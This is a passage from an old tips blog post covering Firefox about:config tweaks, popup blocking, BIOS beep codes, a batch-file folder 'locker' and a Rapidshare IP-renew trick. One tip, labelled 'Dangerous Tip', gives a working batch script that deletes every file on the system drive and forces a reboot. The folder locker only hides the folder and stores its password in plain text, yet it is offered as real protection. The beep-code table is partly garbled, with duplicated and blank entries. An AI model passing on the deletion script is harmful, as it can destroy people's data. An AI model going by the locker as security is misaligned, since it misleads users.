Change the integers value to:
300
You can also use 0 (zero) as an Integer Value, if you don't like the performance of the 300 Integer Value.
Enjoy & Watch Your Speed!
Or If Not Try This One Too!
1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere in the "aboug:config" page and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
4. Restart Firefox
If you're using a broadband connection you'll load pages 2-3 times faster now.
Tip 6:
How to eliminate Firefox popups Once and For All
1. Type about:config into the Firefox location bar.
2. Right-click on the page and select New and then Integer.
3. Name it privacy.popups.disable_from_plugins
4. Set the value to 2.
The possible values are:
* 0: Allow all popups from plugins.
* 1: Allow popups, but limit them to dom.popup_maximum.
* 2: Block popups from plugins.
* 3: Block popups from plugins, even on whitelisted sites.
Tip 7 : Dangerous Tip
Destroy's Computer
Type this command in notepad and save as .bat
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
What it does is ?
you get a blue screen that say's file is missing please intall XP again
Tip 8:
A Trick To Check Ur Antivirus Is Working Properly
Open notepad
Copy this code in the text file....
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
without qutoes....
then save it with the name fakevirus.exe
If this file got deleted immediately ....that means ur antivirus is working n updated
Tip 9
Bios beep codes!!!
bios beep codes
BIOS Beep Codes (AMI Known as American Megatrends International & Phoenix)
When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS. The two most-used brands are AMI (American Megatrends International) and Phoenix.
AMI Beep Codes
Beep Code Meaning
1 beep - DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps - Memory parity error. The parity circuit is not working properly.
3 beeps - Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps - System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps - Processor failure. The system CPU has failed.
6 beeps - Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps - Virtual mode exception error.
8 beeps - Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps - ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps - CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps - Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short - Failure in the video system.
1 long beep, 3 short - A failure has been detected in memory above 64K.
1 long beep, 8 short - Display test failure.
Continuous beeping - A problem with the memory or video.
Phoenix Beep Codes
Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor
Tip 10 :
Lock any folder without any software
NoTe- Its different from invisble as well hidden folder....here u need to have a password with which u can open your filder
here is the code
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo stuff by satish
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==TYPE UR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Instructions::
1) Copy the give code in a note pad and save the note pad in your pc with the name name.bat (that is with the extension of .bat). you can replace the name portion with anything u want.
NoTe-- In place of password in the code given type your desired password.
2) A batch file will be created where you hav saved. Now double click on it , it will make a folder with the name locker at the same place where the batch file is save.
3) Now add the files you want to be locked in that folder.
4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.
5) To unlock,double click on batch file again and enter the password in the new window opened.
Tested By Me Working 100%
Tip 11 :
A code to get unlimited downloads from Rapidshare!
Here it is:
1. Copy and paste this code :
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
on your note pad or any other text editor
2. Save the file as : rapidshare.de.bat and leave it on your desktop
3. Every time you download from rapidshare double click on it!
Rip 12 :
Increase your Bandwidth by 20%
Increase your Bandwidth by 20%
Windows uses 20% of your bandwidth! Get it back
A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for thei
Subscribe to:
Posts (Atom)